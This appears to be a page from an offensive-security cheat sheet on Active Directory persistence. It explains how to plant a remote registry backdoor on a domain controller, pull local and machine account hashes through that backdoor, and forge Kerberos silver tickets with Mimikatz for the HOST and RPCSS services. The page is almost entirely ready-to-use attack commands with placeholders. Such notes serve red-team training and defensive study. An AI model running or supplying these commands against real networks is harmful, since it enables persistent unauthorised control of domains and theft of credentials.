REMOTE REGISTRY BACKDOOR

This is a Domain Persistence technqiue

Adding our backdoor through Remote Registry of the Domain Controller

(Needs Domain Administrator Privilege)

Add-RemoteRegBackdoor -ComputerName <DC FQDN> -Trustee <USERNAME>

Retrieving local user account hash remotely from backdoor trustee using persistence of the backdoor anytime

Get-RemoteLocalAccountHash -ComputerName <DC FQDN>

Retrieving machine account hash remotely from backdoor trustee using persistence of the backdoor anytime

Get-RemoteMachineAccountHash -ComputerName <DC FQDN>

This machine account hash from Domain Controller can be used for Silver Ticket attack

Creating a silver ticket to abuse "HOST" service

Invoke-Mimikatz -Command '"kerberos::golden /domain:<DOMAIN NAME> /sid:<DOMAIN SID> /target:<DC FQDN> /service:HOST /rc4:<NTLM OF MACHINE ACCOUNT> /user:Administrator /ptt"'

Creating a silver ticket to abuse "RPCSS" service

Invoke-Mimikatz -Command '"kerberos::golden /domain:<DOMAIN NAME> /sid:<DOMAIN SID> /target:<DC FQDN> /service:RPCSS /rc4:<NTLM OF MACHINE ACCOUNT> /user:Administrator /ptt"'

After receiving Silver Ticket for RPCSS, WMI calls can be queried

PreviousMODIFYING SECURITY DESCRIPTORS NextDC-SHADOWING

Last updated 3 years ago